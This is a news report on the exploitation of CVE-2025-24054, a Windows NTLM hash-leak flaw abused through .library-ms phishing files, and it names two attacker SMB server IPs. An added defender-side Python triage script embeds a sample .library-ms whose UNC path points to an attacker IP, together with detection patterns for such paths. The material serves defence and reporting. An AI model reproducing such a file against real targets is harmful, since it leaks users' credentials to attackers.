Windows NTLM hash leak flaw exploited in phishing attacks on governments

A recently identified vulnerability in Windows, designated as CVE-2025-24054, has come under active exploitation by cybercriminals, particularly in phishing campaigns aimed at both government bodies and private enterprises. Initially addressed in Microsoft’s March 2025 Patch Tuesday, this flaw was not classified as actively exploited at the time of its release, with assessments suggesting a ‘less likely’ probability of misuse.

However, researchers from Check Point have reported a surge in exploitation activities shortly after the patches were made available, with notable incidents occurring between March 20 and 25, 2025. While one of the IP addresses involved in these attacks has been previously associated with the Russian state-sponsored threat group APT28, the evidence remains insufficient for definitive attribution.

Exposing NTLM hashes

The NTLM (New Technology LAN Manager) protocol, utilized by Microsoft for authentication, employs a challenge-response mechanism that relies on hashes rather than transmitting plaintext passwords. Despite its design to enhance security, NTLM is increasingly viewed as outdated, vulnerable to replay attacks and brute-force cracking of captured hashes. In response, Microsoft is gradually transitioning away from NTLM in favor of more secure alternatives like Kerberos or Negotiate.

In the phishing attacks documented by Check Point, emails were dispatched to targets in Poland and Romania, featuring a Dropbox link that led to a ZIP archive containing a .library-ms file. This file type, typically used to display a Windows library—a virtual container aggregating files and folders from various sources—was manipulated to direct users to a remote SMB server controlled by the attackers.

[Image: Phishing email attaching the exploit file (unzipped). Source: Check Point]

Upon extraction of the ZIP file, Windows Explorer automatically interacts with the .library-ms file, inadvertently triggering the CVE-2025-24054 vulnerability. This action prompts Windows to establish an SMB connection to the specified URL, during which it attempts NTLM authentication, allowing attackers to capture the user’s NTLM hashes.

In a subsequent wave of attacks, Check Point identified phishing emails that included .library-ms attachments without the need for a ZIP archive. Merely downloading the .library-ms file was sufficient to initiate NTLM authentication to the remote server, underscoring the ease with which this vulnerability can be exploited.
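As an added, defender-side example (not code from the Check Point report or this article), the following Python script triages a .library-ms attachment the way a mail gateway or EDR hook could: it parses the file's XML, lists every location the library declares, and flags any that would make Explorer open an SMB or WebDAV session to a host outside the organisation. The sample file body is constructed; the XML namespace, the internal-domain suffix list and the remote location (pointing at the first SMB server IP named in this article) are assumptions.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET  # for attachments from untrusted mail, prefer defusedxml.ElementTree

# Constructed sample body (assumed schema): one local folder plus one UNC path to
# the first attacker SMB server IP named in the article.
SAMPLE_LIBRARY_MS = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>C:\Users\Public\Documents</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>\\159.196.128.120\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

UNC_RE = re.compile(r"^\\\\(?:\?\\UNC\\)?([^\\]+)")             # \\host\share and \\?\UNC\host\share
URL_RE = re.compile(r"^(?:smb|http|https|file)://([^/]+)", re.I)  # smb://, WebDAV and file://host forms
INTERNAL_SUFFIXES = (".local", ".internal", ".lan")  # assumption: extend with your own DNS suffixes

def remote_host(url: str):
    """Host that Explorer would contact for this location, or None when the path is local."""
    m = UNC_RE.match(url) or URL_RE.match(url)
    return m.group(1).rsplit("@", 1)[-1].split(":")[0] if m else None  # strip user@ and :port

def host_is_public(host: str) -> bool:
    """True when the host is a globally routable IP or an FQDN outside the internal suffix list."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return "." in host and not host.lower().endswith(INTERNAL_SUFFIXES)

def triage_library_ms(xml_text: str):
    """Return every <url> location in a .library-ms file with remote/public flags."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.rsplit("}", 1)[-1] != "url" or not elem.text:   # namespace-agnostic tag match
            continue
        url = elem.text.strip()
        host = remote_host(url)
        findings.append({"url": url, "host": host, "remote": host is not None,
                         "public": host is not None and host_is_public(host)})
    return findings

def is_suspicious(xml_text: str) -> bool:
    """Quarantine rule: any location that would send NTLM credentials to a public host."""
    return any(f["public"] for f in triage_library_ms(xml_text))
```

Because the trigger needs no opening or execution, the useful place for this check is before the file reaches a user's download folder, not after.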

“On March 25, 2025, Check Point Research discovered a campaign targeting companies around the world, distributing these files without being zipped,” noted Check Point. “According to Microsoft, this exploit is triggered with minimal user interaction with a malicious file, such as selecting (single-clicking), inspecting (right-clicking), or performing any action other than opening or executing the file.”

The malicious archive also contained three additional files—‘xd.url,’ ‘xd.website,’ and ‘xd.link’—which exploit older NTLM hash leak vulnerabilities, likely included as a backup in case the primary .library-ms method fails. The attacker-controlled SMB servers involved in this campaign were traced to the IP addresses 159.196.128[.]120 and 194.127.179[.]157.

While CVE-2025-24054 is rated as a “medium” severity issue, the implications of capturing NTLM hashes can lead to authentication bypass and privilege escalation, making it a significant concern. Given the minimal user interaction required for exploitation, organizations are urged to treat this vulnerability as high-risk. It is recommended that all entities promptly install the March 2025 updates and disable NTLM authentication if it is not essential to their operations.
